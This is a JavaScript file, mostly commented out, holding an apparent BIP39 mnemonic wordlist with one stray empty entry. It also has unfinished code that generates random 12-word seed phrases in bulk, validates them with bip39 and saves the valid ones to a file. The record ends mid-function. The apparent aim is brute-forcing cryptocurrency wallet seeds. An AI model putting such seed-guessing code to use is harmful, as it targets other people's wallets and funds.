// const wordList = [
//     "abandon",
//     "ability",
//     "able",
//     "about",
//     "above",
//     "absent",
//     "absorb",
//     "abstract",
//     "absurd",
//     "abuse",
//     "access",
//     "accident",
//     "account",
//     "accuse",
//     "achieve",
//     "acid",
//     "acoustic",
//     "acquire",
//     "across",
//     "act",
//     "action",
//     "actor",
//     "actress",
//     "actual",
//     "adapt",
//     "add",
//     "addict",
//     "address",
//     "adjust",
//     "admit",
//     "adult",
//     "advance",
//     "advice",
//     "aerobic",
//     "affair",
//     "afford",
//     "afraid",
//     "again",
//     "age",
//     "agent",
//     "agree",
//     "ahead",
//     "aim",
//     "air",
//     "airport",
//     "aisle",
//     "alarm",
//     "album",
//     "alcohol",
//     "alert",
//     "alien",
//     "all",
//     "alley",
//     "allow",
//     "almost",
//     "alone",
//     "alpha",
//     "already",
//     "also",
//     "alter",
//     "always",
//     "amateur",
//     "amazing",
//     "among",
//     "amount",
//     "amused",
//     "analyst",
//     "anchor",
//     "ancient",
//     "anger",
//     "angle",
//     "angry",
//     "animal",
//     "ankle",
//     "announce",
//     "annual",
//     "another",
//     "answer",
//     "antenna",
//     "antique",
//     "anxiety",
//     "any",
//     "apart",
//     "apology",
//     "appear",
//     "apple",
//     "approve",
//     "april",
//     "arch",
//     "arctic",
//     "area",
//     "arena",
//     "argue",
//     "arm",
//     "armed",
//     "armor",
//     "army",
//     "around",
//     "arrange",
//     "arrest",
//     "arrive",
//     "arrow",
//     "art",
//     "artefact",
//     "artist",
//     "artwork",
//     "ask",
//     "aspect",
//     "assault",
//     "asset",
//     "assist",
//     "assume",
//     "asthma",
//     "athlete",
//     "atom",
//     "attack",
//     "attend",
//     "attitude",
//     "attract",
//     "auction",
//     "audit",
//     "august",
//     "aunt",
//     "author",
//     "auto",
//     "autumn",
//     "average",
//     "avocado",
//     "avoid",
//     "awake",
//     "aware",
//     "away",
//     "awesome",
//     "awful",
//     "awkward",
//     "axis",
//     "baby",
//     "bachelor",
//     "bacon",
//     "badge",
//     "bag",
//     "balance",
//     "balcony",
//     "ball",
//     "bamboo",
//     "banana",
//     "banner",
//     "bar",
//     "barely",
//     "bargain",
//     "barrel",
//     "base",
//     "basic",
//     "basket",
//     "battle",
//     "beach",
//     "bean",
//     "beauty",
//     "because",
//     "become",
//     "beef",
//     "before",
//     "begin",
//     "behave",
//     "behind",
//     "believe",
//     "below",
//     "belt",
//     "bench",
//     "benefit",
//     "best",
//     "betray",
//     "better",
//     "between",
//     "beyond",
//     "bicycle",
//     "bid",
//     "bike",
//     "bind",
//     "biology",
//     "bird",
//     "birth",
//     "bitter",
//     "black",
//     "blade",
//     "blame",
//     "blanket",
//     "blast",
//     "bleak",
//     "bless",
//     "blind",
//     "blood",
//     "blossom",
//     "blouse",
//     "blue",
//     "blur",
//     "blush",
//     "board",
//     "boat",
//     "body",
//     "boil",
//     "bomb",
//     "bone",
//     "bonus",
//     "book",
//     "boost",
//     "border",
//     "boring",
//     "borrow",
//     "boss",
//     "bottom",
//     "bounce",
//     "box",
//     "bracket",
//     "brain",
//     "brand",
//     "brass",
//     "brave",
//     "bread",
//     "breeze",
//     "brick",
//     "bridge",
//     "brief",
//     "bright",
//     "bring",
//     "brisk",
//     "broccoli",
//     "broken",
//     "bronze",
//     "broom",
//     "brother",
//     "brown",
//     "brush",
//     "bubble",
//     "buddy",
//     "budget",
//     "buffalo",
//     "build",
//     "bulb",
//     "bulk",
//     "bullet",
//     "bundle",
//     "bunker",
//     "burden",
//     "burger",
//     "burst",
//     "bus",
//     "business",
//     "busy",
//     "butter",
//     "buyer",
//     "buzz",
//     "cabbage",
//     "cabin",
//     "cable",
//     "cactus",
//     "cage",
//     "cake",
//     "call",
//     "calm",
//     "camera",
//     "camp",
//     "can",
//     "canal",
//     "cancel",
//     "candy",
//     "cannon",
//     "canoe",
//     "canvas",
//     ,
//     "canyon",
//     "capable",
//     "capital",
//     "captain",
//     "car",
//     "carbon",
//     "card",
//     "cargo",
//     "carpet",
//     "carry",
//     "cart",
//     "case",
//     "cash",
//     "casino",
//     "castle",
//     "casual",
//     "cat",
//     "catalog",
//     "catch",
//     "category",
//     "cattle",
//     "caught",
//     "cause",
//     "caution",
//     "cave",
//     "ceiling",
//     "celery",
//     "cement",
//     "census",
//     "century",
//     "cereal",
//     "certain",
//     "chair",
//     "chalk",
//     "champion",
//     "change",
//     "chaos",
//     "chapter",
//     "charge",
//     "chase",
//     "chat",
//     "cheap",
//     "check",
//     "cheese",
//     "chef",
//     "cherry",
//     "chest",
//     "chicken",
//     "chief",
//     "child",
//     "chimney",
//     "choice",
//     "choose",
//     "chronic",
//     "chuckle",
//     "chunk",
//     "churn",
//     "cigar",
//     "cinnamon",
//     "circle",
//     "citizen",
//     "city",
//     "civil",
//     "claim",
//     "clap",
//     "clarify",
//     "claw",
//     "clay",
//     "clean",
//     "clerk",
//     "clever",
//     "click",
//     "client",
//     "cliff",
//     "climb",
//     "clinic",
//     "clip",
//     "clock",
//     "clog",
//     "close",
//     "cloth",
//     "cloud",
//     "clown",
//     "club",
//     "clump",
//     "cluster",
//     "clutch",
//     "coach",
//     "coast",
//     "coconut",
//     "code",
//     "coffee",
//     "coil",
//     "coin",
//     "collect",
//     "color",
//     "column",
//     "combine",
//     "come",
//     "comfort",
//     "comic",
//     "common",
//     "company",
//     "concert",
//     "conduct",
//     "confirm",
//     "congress",
//     "connect",
//     "consider",
//     "control",
//     "convince",
//     "cook",
//     "cool",
//     "copper",
//     "copy",
//     "coral",
//     "core",
//     "corn",
//     "correct",
//     "cost",
//     "cotton",
//     "couch",
//     "country",
//     "couple",
//     "course",
//     "cousin",
//     "cover",
//     "coyote",
//     "crack",
//     "cradle",
//     "craft",
//     "cram",
//     "crane",
//     "crash",
//     "crater",
//     "crawl",
//     "crazy",
//     "cream",
//     "credit",
//     "creek",
//     "crew",
//     "cricket",
//     "crime",
//     "crisp",
//     "critic",
//     "crop",
//     "cross",
//     "crouch",
//     "crowd",
//     "crucial",
//     "cruel",
//     "cruise",
//     "crumble",
//     "crunch",
//     "crush",
//     "cry",
//     "crystal",
//     "cube",
//     "culture",
//     "cup",
//     "cupboard",
//     "curious",
//     "current",
//     "curtain",
//     "curve",
//     "cushion",
//     "custom",
//     "cute",
//     "cycle",
//     "dad",
//     "damage",
//     "damp",
//     "dance",
//     "danger",
//     "daring",
//     "dash",
//     "daughter",
//     "dawn",
//     "day",
//     "deal",
//     "debate",
//     "debris",
//     "decade",
//     "december",
//     "decide",
//     "decline",
//     "decorate",
//     "decrease",
//     "deer",
//     "defense",
//     "define",
//     "defy",
//     "degree",
//     "delay",
//     "deliver",
//     "demand",
//     "demise",
//     "denial",
//     "dentist",
//     "deny",
//     "depart",
//     "depend",
//     "deposit",
//     "depth",
//     "deputy",
//     "derive",
//     "describe",
//     "desert",
//     "design",
//     "desk",
//     "despair",
//     "destroy",
//     "detail",
//     "detect",
//     "develop",
//     "device",
//     "devote",
//     "diagram",
//     "dial",
//     "diamond",
//     "diary",
//     "dice",
//     "diesel",
//     "diet",
//     "differ",
//     "digital",
//     "dignity",
//     "dilemma",
//     "dinner",
//     "dinosaur",
//     "direct",
//     "dirt",
//     "disagree",
//     "discover",
//     "disease",
//     "dish",
//     "dismiss",
//     "disorder",
//     "display",
//     "distance",
//     "divert",
//     "divide",
//     "divorce",
//     "dizzy",
//     "doctor",
//     "document",
//     "dog",
//     "doll",
//     "dolphin",
//     "domain",
//     "donate",
//     "donkey",
//     "donor",
//     "door",
//     "dose",
//     "double",
//     "dove",
//     "draft",
//     "dragon",
//     "drama",
//     "drastic",
//     "draw",
//     "dream",
//     "dress",
//     "drift",
//     "drill",
//     "drink",
//     "drip",
//     "drive",
//     "drop",
//     "drum",
//     "dry",
//     "duck",
//     "dumb",
//     "dune",
//     "during",
//     "dust",
//     "dutch",
//     "duty",
//     "dwarf",
//     "dynamic",
//     "eager",
//     "eagle",
//     "early",
//     "earn",
//     "earth",
//     "easily",
//     "east",
//     "easy",
//     "echo",
//     "ecology",
//     "economy",
//     "edge",
//     "edit",
//     "educate",
//     "effort",
//     "egg",
//     "eight",
//     "either",
//     "elbow",
//     "elder",
//     "electric",
//     "elegant",
//     "element",
//     "elephant",
//     "elevator",
//     "elite",
//     "else",
//     "embark",
//     "embody",
//     "embrace",
//     "emerge",
//     "emotion",
//     "employ",
//     "empower",
//     "empty",
//     "enable",
//     "enact",
//     "end",
//     "endless",
//     "endorse",
//     "enemy",
//     "energy",
//     "enforce",
//     "engage",
//     "engine",
//     "enhance",
//     "enjoy",
//     "enlist",
//     "enough",
//     "enrich",
//     "enroll",
//     "ensure",
//     "enter",
//     "entire",
//     "entry",
//     "envelope",
//     "episode",
//     "equal",
//     "equip",
//     "era",
//     "erase",
//     "erode",
//     "erosion",
//     "error",
//     "erupt",
//     "escape",
//     "essay",
//     "essence",
//     "estate",
//     "eternal",
//     "ethics",
//     "evidence",
//     "evil",
//     "evoke",
//     "evolve",
//     "exact",
//     "example",
//     "excess",
//     "exchange",
//     "excite",
//     "exclude",
//     "excuse",
//     "execute",
//     "exercise",
//     "exhaust",
//     "exhibit",
//     "exile",
//     "exist",
//     "exit",
//     "exotic",
//     "expand",
//     "expect",
//     "expire",
//     "explain",
//     "expose",
//     "express",
//     "extend",
//     "extra",
//     "eye",
//     "eyebrow",
//     "fabric",
//     "face",
//     "faculty",
//     "fade",
//     "faint",
//     "faith",
//     "fall",
//     "false",
//     "fame",
//     "family",
//     "famous",
//     "fan",
//     "fancy",
//     "fantasy",
//     "farm",
//     "fashion",
//     "fat",
//     "fatal",
//     "father",
//     "fatigue",
//     "fault",
//     "favorite",
//     "feature",
//     "february",
//     "federal",
//     "fee",
//     "feed",
//     "feel",
//     "female",
//     "fence",
//     "festival",
//     "fetch",
//     "fever",
//     "few",
//     "fiber",
//     "fiction",
//     "field",
//     "figure",
//     "file",
//     "film",
//     "filter",
//     "final",
//     "find",
//     "fine",
//     "finger",
//     "finish",
//     "fire",
//     "firm",
//     "first",
//     "fiscal",
//     "fish",
//     "fit",
//     "fitness",
//     "fix",
//     "flag",
//     "flame",
//     "flash",
//     "flat",
//     "flavor",
//     "flee",
//     "flight",
//     "flip",
//     "float",
//     "flock",
//     "floor",
//     "flower",
//     "fluid",
//     "flush",
//     "fly",
//     "foam",
//     "focus",
//     "fog",
//     "foil",
//     "fold",
//     "follow",
//     "food",
//     "foot",
//     "force",
//     "forest",
//     "forget",
//     "fork",
//     "fortune",
//     "forum",
//     "forward",
//     "fossil",
//     "foster",
//     "found",
//     "fox",
//     "fragile",
//     "frame",
//     "frequent",
//     "fresh",
//     "friend",
//     "fringe",
//     "frog",
//     "front",
//     "frost",
//     "frown",
//     "frozen",
//     "fruit",
//     "fuel",
//     "fun",
//     "funny",
//     "furnace",
//     "fury",
//     "future",
//     "gadget",
//     "gain",
//     "galaxy",
//     "gallery",
//     "game",
//     "gap",
//     "garage",
//     "garbage",
//     "garden",
//     "garlic",
//     "garment",
//     "gas",
//     "gasp",
//     "gate",
//     "gather",
//     "gauge",
//     "gaze",
//     "general",
//     "genius",
//     "genre",
//     "gentle",
//     "genuine",
//     "gesture",
//     "ghost",
//     "giant",
//     "gift",
//     "giggle",
//     "ginger",
//     "giraffe",
//     "girl",
//     "give",
//     "glad",
//     "glance",
//     "glare",
//     "glass",
//     "glide",
//     "glimpse",
//     "globe",
//     "gloom",
//     "glory",
//     "glove",
//     "glow",
//     "glue",
//     "goat",
//     "goddess",
//     "gold",
//     "good",
//     "goose",
//     "gorilla",
//     "gospel",
//     "gossip",
//     "govern",
//     "gown",
//     "grab",
//     "grace",
//     "grain",
//     "grant",
//     "grape",
//     "grass",
//     "gravity",
//     "great",
//     "green",
//     "grid",
//     "grief",
//     "grit",
//     "grocery",
//     "group",
//     "grow",
//     "grunt",
//     "guard",
//     "guess",
//     "guide",
//     "guilt",
//     "guitar",
//     "gun",
//     "gym",
//     "habit",
//     "hair",
//     "half",
//     "hammer",
//     "hamster",
//     "hand",
//     "happy",
//     "harbor",
//     "hard",
//     "harsh",
//     "harvest",
//     "hat",
//     "have",
//     "hawk",
//     "hazard",
//     "head",
//     "health",
//     "heart",
//     "heavy",
//     "hedgehog",
//     "height",
//     "hello",
//     "helmet",
//     "help",
//     "hen",
//     "hero",
//     "hidden",
//     "high",
//     "hill",
//     "hint",
//     "hip",
//     "hire",
//     "history",
//     "hobby",
//     "hockey",
//     "hold",
//     "hole",
//     "holiday",
//     "hollow",
//     "home",
//     "honey",
//     "hood",
//     "hope",
//     "horn",
//     "horror",
//     "horse",
//     "hospital",
//     "host",
//     "hotel",
//     "hour",
//     "hover",
//     "hub",
//     "huge",
//     "human",
//     "humble",
//     "humor",
//     "hundred",
//     "hungry",
//     "hunt",
//     "hurdle",
//     "hurry",
//     "hurt",
//     "husband",
//     "hybrid",
//     "ice",
//     "icon",
//     "idea",
//     "identify",
//     "idle",
//     "ignore",
//     "illegal",
//     "illness",
//     "image",
//     "imitate",
//     "immense",
//     "immune",
//     "impact",
//     "impose",
//     "improve",
//     "impulse",
//     "inch",
//     "include",
//     "income",
//     "increase",
//     "index",
//     "indicate",
//     "indoor",
//     "industry",
//     "infant",
//     "inflict",
//     "inform",
//     "inhale",
//     "inherit",
//     "initial",
//     "inject",
//     "injury",
//     "inmate",
//     "inner",
//     "innocent",
//     "input",
//     "inquiry",
//     "insane",
//     "insect",
//     "inside",
//     "inspire",
//     "install",
//     "intact",
//     "interest",
//     "into",
//     "invest",
//     "invite",
//     "involve",
//     "iron",
//     "island",
//     "isolate",
//     "issue",
//     "item",
//     "ivory",
//     "jacket",
//     "jaguar",
//     "jar",
//     "jazz",
//     "jealous",
//     "jeans",
//     "jelly",
//     "jewel",
//     "job",
//     "join",
//     "joke",
//     "journey",
//     "joy",
//     "judge",
//     "juice",
//     "jump",
//     "jungle",
//     "junior",
//     "junk",
//     "just",
//     "kangaroo",
//     "keen",
//     "keep",
//     "ketchup",
//     "key",
//     "kick",
//     "kid",
//     "kidney",
//     "kind",
//     "kingdom",
//     "kiss",
//     "kit",
//     "kitchen",
//     "kite",
//     "kitten",
//     "kiwi",
//     "knee",
//     "knife",
//     "knock",
//     "know",
//     "lab",
//     "label",
//     "labor",
//     "ladder",
//     "lady",
//     "lake",
//     "lamp",
//     "language",
//     "laptop",
//     "large",
//     "later",
//     "latin",
//     "laugh",
//     "laundry",
//     "lava",
//     "law",
//     "lawn",
//     "lawsuit",
//     "layer",
//     "lazy",
//     "leader",
//     "leaf",
//     "learn",
//     "leave",
//     "lecture",
//     "left",
//     "leg",
//     "legal",
//     "legend",
//     "leisure",
//     "lemon",
//     "lend",
//     "length",
//     "lens",
//     "leopard",
//     "lesson",
//     "letter",
//     "level",
//     "liar",
//     "liberty",
//     "library",
//     "license",
//     "life",
//     "lift",
//     "light",
//     "like",
//     "limb",
//     "limit",
//     "link",
//     "lion",
//     "liquid",
//     "list",
//     "little",
//     "live",
//     "lizard",
//     "load",
//     "loan",
//     "lobster",
//     "local",
//     "lock",
//     "logic",
//     "lonely",
//     "long",
//     "loop",
//     "lottery",
//     "loud",
//     "lounge",
//     "love",
//     "loyal",
//     "lucky",
//     "luggage",
//     "lumber",
//     "lunar",
//     "lunch",
//     "luxury",
//     "lyrics",
//     "machine",
//     "mad",
//     "magic",
//     "magnet",
//     "maid",
//     "mail",
//     "main",
//     "major",
//     "make",
//     "mammal",
//     "man",
//     "manage",
//     "mandate",
//     "mango",
//     "mansion",
//     "manual",
//     "maple",
//     "marble",
//     "march",
//     "margin",
//     "marine",
//     "market",
//     "marriage",
//     "mask",
//     "mass",
//     "master",
//     "match",
//     "material",
//     "math",
//     "matrix",
//     "matter",
//     "maximum",
//     "maze",
//     "meadow",
//     "mean",
//     "measure",
//     "meat",
//     "mechanic",
//     "medal",
//     "media",
//     "melody",
//     "melt",
//     "member",
//     "memory",
//     "mention",
//     "menu",
//     "mercy",
//     "merge",
//     "merit",
//     "merry",
//     "mesh",
//     "message",
//     "metal",
//     "method",
//     "middle",
//     "midnight",
//     "milk",
//     "million",
//     "mimic",
//     "mind",
//     "minimum",
//     "minor",
//     "minute",
//     "miracle",
//     "mirror",
//     "misery",
//     "miss",
//     "mistake",
//     "mix",
//     "mixed",
//     "mixture",
//     "mobile",
//     "model",
//     "modify",
//     "mom",
//     "moment",
//     "monitor",
//     "monkey",
//     "monster",
//     "month",
//     "moon",
//     "moral",
//     "more",
//     "morning",
//     "mosquito",
//     "mother",
//     "motion",
//     "motor",
//     "mountain",
//     "mouse",
//     "move",
//     "movie",
//     "much",
//     "muffin",
//     "mule",
//     "multiply",
//     "muscle",
//     "museum",
//     "mushroom",
//     "music",
//     "must",
//     "mutual",
//     "myself",
//     "mystery",
//     "myth",
//     "naive",
//     "name",
//     "napkin",
//     "narrow",
//     "nasty",
//     "nation",
//     "nature",
//     "near",
//     "neck",
//     "need",
//     "negative",
//     "neglect",
//     "neither",
//     "nephew",
//     "nerve",
//     "nest",
//     "net",
//     "network",
//     "neutral",
//     "never",
//     "news",
//     "next",
//     "nice",
//     "night",
//     "noble",
//     "noise",
//     "nominee",
//     "noodle",
//     "normal",
//     "north",
//     "nose",
//     "notable",
//     "note",
//     "nothing",
//     "notice",
//     "novel",
//     "now",
//     "nuclear",
//     "number",
//     "nurse",
//     "nut",
//     "oak",
//     "obey",
//     "object",
//     "oblige",
//     "obscure",
//     "observe",
//     "obtain",
//     "obvious",
//     "occur",
//     "ocean",
//     "october",
//     "odor",
//     "off",
//     "offer",
//     "office",
//     "often",
//     "oil",
//     "okay",
//     "old",
//     "olive",
//     "olympic",
//     "omit",
//     "once",
//     "one",
//     "onion",
//     "online",
//     "only",
//     "open",
//     "opera",
//     "opinion",
//     "oppose",
//     "option",
//     "orange",
//     "orbit",
//     "orchard",
//     "order",
//     "ordinary",
//     "organ",
//     "orient",
//     "original",
//     "orphan",
//     "ostrich",
//     "other",
//     "outdoor",
//     "outer",
//     "output",
//     "outside",
//     "oval",
//     "oven",
//     "over",
//     "own",
//     "owner",
//     "oxygen",
//     "oyster",
//     "ozone",
//     "pact",
//     "paddle",
//     "page",
//     "pair",
//     "palace",
//     "palm",
//     "panda",
//     "panel",
//     "panic",
//     "panther",
//     "paper",
//     "parade",
//     "parent",
//     "park",
//     "parrot",
//     "party",
//     "pass",
//     "patch",
//     "path",
//     "patient",
//     "patrol",
//     "pattern",
//     "pause",
//     "pave",
//     "payment",
//     "peace",
//     "peanut",
//     "pear",
//     "peasant",
//     "pelican",
//     "pen",
//     "penalty",
//     "pencil",
//     "people",
//     "pepper",
//     "perfect",
//     "permit",
//     "person",
//     "pet",
//     "phone",
//     "photo",
//     "phrase",
//     "physical",
//     "piano",
//     "picnic",
//     "picture",
//     "piece",
//     "pig",
//     "pigeon",
//     "pill",
//     "pilot",
//     "pink",
//     "pioneer",
//     "pipe",
//     "pistol",
//     "pitch",
//     "pizza",
//     "place",
//     "planet",
//     "plastic",
//     "plate",
//     "play",
//     "please",
//     "pledge",
//     "pluck",
//     "plug",
//     "plunge",
//     "poem",
//     "poet",
//     "point",
//     "polar",
//     "pole",
//     "police",
//     "pond",
//     "pony",
//     "pool",
//     "popular",
//     "portion",
//     "position",
//     "possible",
//     "post",
//     "potato",
//     "pottery",
//     "poverty",
//     "powder",
//     "power",
//     "practice",
//     "praise",
//     "predict",
//     "prefer",
//     "prepare",
//     "present",
//     "pretty",
//     "prevent",
//     "price",
//     "pride",
//     "primary",
//     "print",
//     "priority",
//     "prison",
//     "private",
//     "prize",
//     "problem",
//     "process",
//     "produce",
//     "profit",
//     "program",
//     "project",
//     "promote",
//     "proof",
//     "property",
//     "prosper",
//     "protect",
//     "proud",
//     "provide",
//     "public",
//     "pudding",
//     "pull",
//     "pulp",
//     "pulse",
//     "pumpkin",
//     "punch",
//     "pupil",
//     "puppy",
//     "purchase",
//     "purity",
//     "purpose",
//     "purse",
//     "push",
//     "put",
//     "puzzle",
//     "pyramid",
//     "quality",
//     "quantum",
//     "quarter",
//     "question",
//     "quick",
//     "quit",
//     "quiz",
//     "quote",
//     "rabbit",
//     "raccoon",
//     "race",
//     "rack",
//     "radar",
//     "radio",
//     "rail",
//     "rain",
//     "raise",
//     "rally",
//     "ramp",
//     "ranch",
//     "random",
//     "range",
//     "rapid",
//     "rare",
//     "rate",
//     "rather",
//     "raven",
//     "raw",
//     "razor",
//     "ready",
//     "real",
//     "reason",
//     "rebel",
//     "rebuild",
//     "recall",
//     "receive",
//     "recipe",
//     "record",
//     "recycle",
//     "reduce",
//     "reflect",
//     "reform",
//     "refuse",
//     "region",
//     "regret",
//     "regular",
//     "reject",
//     "relax",
//     "release",
//     "relief",
//     "rely",
//     "remain",
//     "remember",
//     "remind",
//     "remove",
//     "render",
//     "renew",
//     "rent",
//     "reopen",
//     "repair",
//     "repeat",
//     "replace",
//     "report",
//     "require",
//     "rescue",
//     "resemble",
//     "resist",
//     "resource",
//     "response",
//     "result",
//     "retire",
//     "retreat",
//     "return",
//     "reunion",
//     "reveal",
//     "review",
//     "reward",
//     "rhythm",
//     "rib",
//     "ribbon",
//     "rice",
//     "rich",
//     "ride",
//     "ridge",
//     "rifle",
//     "right",
//     "rigid",
//     "ring",
//     "riot",
//     "ripple",
//     "risk",
//     "ritual",
//     "rival",
//     "river",
//     "road",
//     "roast",
//     "robot",
//     "robust",
//     "rocket",
//     "romance",
//     "roof",
//     "rookie",
//     "room",
//     "rose",
//     "rotate",
//     "rough",
//     "round",
//     "route",
//     "royal",
//     "rubber",
//     "rude",
//     "rug",
//     "rule",
//     "run",
//     "runway",
//     "rural",
//     "sad",
//     "saddle",
//     "sadness",
//     "safe",
//     "sail",
//     "salad",
//     "salmon",
//     "salon",
//     "salt",
//     "salute",
//     "same",
//     "sample",
//     "sand",
//     "satisfy",
//     "satoshi",
//     "sauce",
//     "sausage",
//     "save",
//     "say",
//     "scale",
//     "scan",
//     "scare",
//     "scatter",
//     "scene",
//     "scheme",
//     "school",
//     "science",
//     "scissors",
//     "scorpion",
//     "scout",
//     "scrap",
//     "screen",
//     "script",
//     "scrub",
//     "sea",
//     "search",
//     "season",
//     "seat",
//     "second",
//     "secret",
//     "section",
//     "security",
//     "seed",
//     "seek",
//     "segment",
//     "select",
//     "sell",
//     "seminar",
//     "senior",
//     "sense",
//     "sentence",
//     "series",
//     "service",
//     "session",
//     "settle",
//     "setup",
//     "seven",
//     "shadow",
//     "shaft",
//     "shallow",
//     "share",
//     "shed",
//     "shell",
//     "sheriff",
//     "shield",
//     "shift",
//     "shine",
//     "ship",
//     "shiver",
//     "shock",
//     "shoe",
//     "shoot",
//     "shop",
//     "short",
//     "shoulder",
//     "shove",
//     "shrimp",
//     "shrug",
//     "shuffle",
//     "shy",
//     "sibling",
//     "sick",
//     "side",
//     "siege",
//     "sight",
//     "sign",
//     "silent",
//     "silk",
//     "silly",
//     "silver",
//     "similar",
//     "simple",
//     "since",
//     "sing",
//     "siren",
//     "sister",
//     "situate",
//     "six",
//     "size",
//     "skate",
//     "sketch",
//     "ski",
//     "skill",
//     "skin",
//     "skirt",
//     "skull",
//     "slab",
//     "slam",
//     "sleep",
//     "slender",
//     "slice",
//     "slide",
//     "slight",
//     "slim",
//     "slogan",
//     "slot",
//     "slow",
//     "slush",
//     "small",
//     "smart",
//     "smile",
//     "smoke",
//     "smooth",
//     "snack",
//     "snake",
//     "snap",
//     "sniff",
//     "snow",
//     "soap",
//     "soccer",
//     "social",
//     "sock",
//     "soda",
//     "soft",
//     "solar",
//     "soldier",
//     "solid",
//     "solution",
//     "solve",
//     "someone",
//     "song",
//     "soon",
//     "sorry",
//     "sort",
//     "soul",
//     "sound",
//     "soup",
//     "source",
//     "south",
//     "space",
//     "spare",
//     "spatial",
//     "spawn",
//     "speak",
//     "special",
//     "speed",
//     "spell",
//     "spend",
//     "sphere",
//     "spice",
//     "spider",
//     "spike",
//     "spin",
//     "spirit",
//     "split",
//     "spoil",
//     "sponsor",
//     "spoon",
//     "sport",
//     "spot",
//     "spray",
//     "spread",
//     "spring",
//     "spy",
//     "square",
//     "squeeze",
//     "squirrel",
//     "stable",
//     "stadium",
//     "staff",
//     "stage",
//     "stairs",
//     "stamp",
//     "stand",
//     "start",
//     "state",
//     "stay",
//     "steak",
//     "steel",
//     "stem",
//     "step",
//     "stereo",
//     "stick",
//     "still",
//     "sting",
//     "stock",
//     "stomach",
//     "stone",
//     "stool",
//     "story",
//     "stove",
//     "strategy",
//     "street",
//     "strike",
//     "strong",
//     "struggle",
//     "student",
//     "stuff",
//     "stumble",
//     "style",
//     "subject",
//     "submit",
//     "subway",
//     "success",
//     "such",
//     "sudden",
//     "suffer",
//     "sugar",
//     "suggest",
//     "suit",
//     "summer",
//     "sun",
//     "sunny",
//     "sunset",
//     "super",
//     "supply",
//     "supreme",
//     "sure",
//     "surface",
//     "surge",
//     "surprise",
//     "surround",
//     "survey",
//     "suspect",
//     "sustain",
//     "swallow",
//     "swamp",
//     "swap",
//     "swarm",
//     "swear",
//     "sweet",
//     "swift",
//     "swim",
//     "swing",
//     "switch",
//     "sword",
//     "symbol",
//     "symptom",
//     "syrup",
//     "system",
//     "table",
//     "tackle",
//     "tag",
//     "tail",
//     "talent",
//     "talk",
//     "tank",
//     "tape",
//     "target",
//     "task",
//     "taste",
//     "tattoo",
//     "taxi",
//     "teach",
//     "team",
//     "tell",
//     "ten",
//     "tenant",
//     "tennis",
//     "tent",
//     "term",
//     "test",
//     "text",
//     "thank",
//     "that",
//     "theme",
//     "then",
//     "theory",
//     "there",
//     "they",
//     "thing",
//     "this",
//     "thought",
//     "three",
//     "thrive",
//     "throw",
//     "thumb",
//     "thunder",
//     "ticket",
//     "tide",
//     "tiger",
//     "tilt",
//     "timber",
//     "time",
//     "tiny",
//     "tip",
//     "tired",
//     "tissue",
//     "title",
//     "toast",
//     "tobacco",
//     "today",
//     "toddler",
//     "toe",
//     "together",
//     "toilet",
//     "token",
//     "tomato",
//     "tomorrow",
//     "tone",
//     "tongue",
//     "tonight",
//     "tool",
//     "tooth",
//     "top",
//     "topic",
//     "topple",
//     "torch",
//     "tornado",
//     "tortoise",
//     "toss",
//     "total",
//     "tourist",
//     "toward",
//     "tower",
//     "town",
//     "toy",
//     "track",
//     "trade",
//     "traffic",
//     "tragic",
//     "train",
//     "transfer",
//     "trap",
//     "trash",
//     "travel",
//     "tray",
//     "treat",
//     "tree",
//     "trend",
//     "trial",
//     "tribe",
//     "trick",
//     "trigger",
//     "trim",
//     "trip",
//     "trophy",
//     "trouble",
//     "truck",
//     "true",
//     "truly",
//     "trumpet",
//     "trust",
//     "truth",
//     "try",
//     "tube",
//     "tuition",
//     "tumble",
//     "tuna",
//     "tunnel",
//     "turkey",
//     "turn",
//     "turtle",
//     "twelve",
//     "twenty",
//     "twice",
//     "twin",
//     "twist",
//     "two",
//     "type",
//     "typical",
//     "ugly",
//     "umbrella",
//     "unable",
//     "unaware",
//     "uncle",
//     "uncover",
//     "under",
//     "undo",
//     "unfair",
//     "unfold",
//     "unhappy",
//     "uniform",
//     "unique",
//     "unit",
//     "universe",
//     "unknown",
//     "unlock",
//     "until",
//     "unusual",
//     "unveil",
//     "update",
//     "upgrade",
//     "uphold",
//     "upon",
//     "upper",
//     "upset",
//     "urban",
//     "urge",
//     "usage",
//     "use",
//     "used",
//     "useful",
//     "useless",
//     "usual",
//     "utility",
//     "vacant",
//     "vacuum",
//     "vague",
//     "valid",
//     "valley",
//     "valve",
//     "van",
//     "vanish",
//     "vapor",
//     "various",
//     "vast",
//     "vault",
//     "vehicle",
//     "velvet",
//     "vendor",
//     "venture",
//     "venue",
//     "verb",
//     "verify",
//     "version",
//     "very",
//     "vessel",
//     "veteran",
//     "viable",
//     "vibrant",
//     "vicious",
//     "victory",
//     "video",
//     "view",
//     "village",
//     "vintage",
//     "violin",
//     "virtual",
//     "virus",
//     "visa",
//     "visit",
//     "visual",
//     "vital",
//     "vivid",
//     "vocal",
//     "voice",
//     "void",
//     "volcano",
//     "volume",
//     "vote",
//     "voyage",
//     "wage",
//     "wagon",
//     "wait",
//     "walk",
//     "wall",
//     "walnut",
//     "want",
//     "warfare",
//     "warm",
//     "warrior",
//     "wash",
//     "wasp",
//     "waste",
//     "water",
//     "wave",
//     "way",
//     "wealth",
//     "weapon",
//     "wear",
//     "weasel",
//     "weather",
//     "web",
//     "wedding",
//     "weekend",
//     "weird",
//     "welcome",
//     "west",
//     "wet",
//     "whale",
//     "what",
//     "wheat",
//     "wheel",
//     "when",
//     "where",
//     "whip",
//     "whisper",
//     "wide",
//     "width",
//     "wife",
//     "wild",
//     "win",
//     "window",
//     "wine",
//     "wing",
//     "wink",
//     "winner",
//     "winter",
//     "wire",
//     "wisdom",
//     "wise",
//     "wish",
//     "witness",
//     "wolf",
//     "woman",
//     "wonder",
//     "wood",
//     "wool",
//     "word",
//     "work",
//     "world",
//     "worry",
//     "worth",
//     "wrap",
//     "wreck",
//     "wrestle",
//     "wrist",
//     "write",
//     "wrong",
//     "yard",
//     "year",
//     "yellow",
//     "you",
//     "young",
//     "youth",
//     "zebra",
//     "zero",
//     "zone",
//     "zoo",
//   ];

var fs = require("fs");
// const bip39 = require("bip39");

// function generateRandomMnemonic() {
//   let mnemonic = "";
//   for (let i = 0; i < 12; i++) {
//     const randomIndex = Math.floor(Math.random() * wordList.length);
//     mnemonic += wordList[randomIndex] + " ";
//   }
//   return mnemonic.trim(); // Remove trailing space
// }

// for (let i = 0; i < 600000; i++) {
//   const mnemonic = generateRandomMnemonic();
//   function isValidMnemonic(mnemonic) {
//     try {
//       bip39.mnemonicToEntropy(mnemonic);
//       console.log(mnemonic);
//       const content = mnemonic + "\n";
//       fs.appendFile("check.txt", content, (err) => {
